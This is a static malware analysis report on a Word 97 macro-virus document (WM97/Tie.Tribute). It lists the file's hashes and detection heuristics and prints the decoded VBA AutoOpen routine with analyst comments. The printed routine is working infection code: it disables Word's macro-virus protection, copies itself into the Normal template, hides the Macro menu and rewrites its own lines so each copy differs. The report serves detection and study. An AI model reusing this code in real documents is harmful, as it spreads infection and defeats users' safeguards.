Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a8261b628c5296fc…

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-03-30 06:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1ddab69059f6ad0ab46fbcd55d605e32 SHA-1: d5569eef271184aea393f1de31fcec88fd19d4b5 SHA-256: a8261b628c5296fc97e5328f3e459ed31e89967970dd31684d0287ecb9bc6aac
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros with AutoOpen and AutoClose functions, indicating malicious intent. The document body provides instructions for removing 'Happy99.exe' and related files, which appears to be a social engineering tactic to mask the true malicious activity. The VBA script likely attempts to download or execute further payloads, as suggested by the presence of macro code and the heuristic firings; note, however, that the recovered macro source shown below copies the module between the open document and the Normal template (classic macro-virus self-replication) and no download routine is visible in the previewed portion, so that inference should be confirmed against the full 18152-byte script before it is reported as established behaviour.

Heuristics 5

  • ClamAV: Doc.Trojan.Class-39 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-39
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18152 bytes
SHA-256: 115f52dd313173b53b8de346b0649b54cc6c3e3b9a6d31d749a7482d50e89a14
Preview script
First 1,000 lines of the extracted script
' Export header written by the VBA project exporter for the "ThisDocument" class module.
' These Attribute lines are metadata, not executable code; VB_TemplateDerived /
' VB_Customizable are consistent with a module living in a document template.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' Analyst annotation of the decoded macro: this is the infection routine of a Word 97
' macro virus (the next Sub is labelled "WM97/Tie.Tribute"). It runs automatically when the
' document is opened, copies this module between the open document and the Normal template,
' and then rewrites the copy so each infected file differs from the last.
' Obfuscation used throughout: Cos(Atn(CInt(1))) evaluates to ~0.707, which is coerced to 1
' when used as a collection index, i.e. "the first VBComponent"; Chr()/Asc() chains hide
' plain strings and numbers from simple string-based scanners. Decoded values are given
' next to each line below.

Dim rsxg, roxg, xixg, xxig As Integer: Dim xxey, xexy, exxy, exdy, cxiy, cixy, xicy, eoxy, xoey, oxey, ciiy, rxey, rexy, exry, nixy, ixny, nxiy, lnry, nrly, rnly As String
' NOTE: in VBA only the last name of each comma list receives the declared type; the others
' are Variant. rt, dt, Tri, rip and j are never declared at all.

Randomize
' Seeds Rnd() for the random junk-comment generator at the end of this Sub.

On Error GoTo bit
' Any runtime error (e.g. the VBProject object model being inaccessible) jumps to the
' 'bit' label near the end instead of surfacing an error dialog.

Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48)
' Chr(48) is "0"; assigned to these Boolean options it coerces to False. This silences Word's
' macro-virus warning and the "save changes to Normal?" prompt that would otherwise reveal
' the template being modified. Detection: a macro clearing Options.VirusProtection is itself
' a strong macro-virus indicator.

rt = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
' rt: number of code lines in the open document's first VBA module (0 = no macro present).

dt = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
' dt: the same count for the global Normal template.

If dt > 0 And rt > 0 Then GoTo bit
' Both sides already carry code: treated as already infected, skip to the end.

If dt = 0 Then
' Normal template has no code: infect it from the open document.

    Set Tri = NormalTemplate.VBProject.VBComponents

    Set rip = ActiveDocument.VBProject.VBComponents

    ' Date trigger: on 24 March three message boxes are shown. Decoded Chr() text:
    ' "      -Rest In Peace-", "    Tie, the kitty Cat!", "    I MISS YOU :~("
    If Month(Now()) = 3 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(45) + Chr(82) + Chr(101) + Chr(115) + Chr(116) + Chr(32) + Chr(73) + Chr(110) + Chr(32) + Chr(80) + Chr(101) + Chr(97) + Chr(99) + Chr(101) + Chr(45)

    If Month(Now()) = 3 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(84) + Chr(105) + Chr(101) + Chr(44) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(107) + Chr(105) + Chr(116) + Chr(116) + Chr(121) + Chr(32) + Chr(67) + Chr(97) + Chr(116) + Chr(33)
  
    If Month(Now()) = 3 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(73) + Chr(32) + Chr(77) + Chr(73) + Chr(83) + Chr(83) + Chr(32) + Chr(89) + Chr(79) + Chr(85) + Chr(32) + Chr(58) + Chr(126) + Chr(40)

    ' Renames the document's module to match the name of Normal's first module.
    rip.Item(Cos(Atn(CInt(1)))).Name = Tri.Item(Cos(Atn(CInt(1)))).Name

    ' Exports the document's module to disk at <Application.StartupPath><System.Version>.Tie
    ' (Chr(46)+Chr(84)+Chr(105)+Chr(101) = ".Tie"). This file in the Word startup folder is
    ' an on-disk artifact of infection and a useful hunting indicator.
    rip.Item(Cos(Atn(CInt(1)))).Export Application.StartupPath & System.Version & Chr(46) + Chr(84) + Chr(105) + Chr(101)
    
End If

If rt = 0 Then Set Tri = ActiveDocument.VBProject.VBComponents
' Open document has no code: reverse direction and make the document's module the target.

Tri.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Application.StartupPath & System.Version & Chr(46) + Chr(84) + Chr(105) + Chr(101)
' Appends the contents of the exported .Tie file into the target module. When dt <> 0 the
' file is presumed to exist from an earlier infection of Normal (not verified here).

With Tri.Item(Cos(Atn(CInt(1)))).codemodule
' Deletes line 1 four times (loop bounds Chr(49)="1" .. Chr(52)="4", argument Chr(49)="1").
' Presumably this strips the leading lines of the appended export -- confirm against an
' actual .Tie file before relying on that reading.

    For j = Chr(49) To Chr(52)

    .deletelines Chr(49)

    Next j

    End With

If dt = 0 Then Tri.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 1, "Sub AutoClose()"
' When infecting Normal: the copy's first line becomes "Sub AutoClose()", so the template copy
' runs when documents are closed rather than opened.

If dt = 0 Then Tri.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 83, "Sub ToolsMarco()"
' Line 83 of the copy is renamed "Sub ToolsMarco()". This looks like a misspelling of
' ToolsMacro, Word's built-in command name for Tools > Macro (a macro with that name would
' intercept the menu command) -- not confirmed from the visible source.

If dt = 0 Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Enabled = False
' Decoded: CommandBars("tools").Controls("Macro").Enabled = False -- greys out the Tools >
' Macro menu entry so the user cannot open the macro editor from the menu.

If dt = 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' Saves the document over itself so the modified VBA project is persisted.

With Tri.Item(Cos(Atn(CInt(1)))).codemodule
' Polymorphic pass: every second line starting at line 2 (Chr(50) = "2" is both the start and
' the Step) is overwritten with a comment line (Chr(39) = "'") built from random characters.
' In this listing every statement is separated by a blank line, so those blank lines are what
' gets rewritten -- each infected copy then has a different hash while behaving the same.

   For j = Chr(50) To Tri.Item(Cos(Atn(CInt(1)))).codemodule.countoflines Step Chr(50)

    ' Four random integers drive the junk text.
    rsxg = Int(Rnd(11) * 4998) + 24: roxg = Int(Rnd(15) * 5863) + 33: xixg = Int(Rnd(44) * 3544) + 55: xxig = Int(Rnd(23) * 5745) + 44

    ' Asc() of a number is Asc() of its first digit when coerced to a string (presumably
    ' 49..57 here), and the +/- offsets then land in printable ASCII.
    ciiy = Asc(rsxg): eoxy = Chr$(ciiy + 5): xoey = Chr$(ciiy - 14): oxey = Chr$(ciiy + 22): lnry = Chr$(ciiy - 4)

    cixy = Asc(roxg): rxey = Chr$(cixy + 7): rexy = Chr$(cixy - 16): exry = Chr$(cixy + 4): nrly = Chr$(cixy - 17)

    xicy = Asc(xixg): nixy = Chr$(xicy + 9): ixny = Chr$(xicy - 18): nxiy = Chr$(xicy + 8): rnly = Chr$(xicy - 33)
    
    cxiy = Asc(xxig): xxey = Chr$(cxiy + 4): xexy = Chr$(cxiy - 3): exxy = Chr$(cxiy + 18): exdy = Chr$(cxiy - 12)

    ' Replace line j with an apostrophe followed by the random character string.
    .replaceline j, Chr(39) & xxey & xexy & exxy & exdy & eoxy & rxey & nixy & xoey & rexy & ixny & oxey & exry & nixy & lnry & nrly & rnly & xxey & xexy & exxy & exdy & xoey & rexy & ixny & oxey & exry & nixy & rnly & xxey & xexy & exxy & exdy & xoey & eoxy & rxey & nixy & xoey & rexy & nixy & xoey & rexy & ixny & oxey & exry & nixy & lnry & nrly & rnly & xxey & xexy & exxy & exdy & xoey & rexy & ixny & oxey & exry & nixy & rnly & xxey

   Next j

End With

bit:
' Error-handler target; also reached by normal fall-through.

If dt <> 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' Normal was already infected and the document was clean: save the newly infected document.

End Sub

Sub ViewVBCode() 'WM97/Tie.Tribute by 
... (truncated)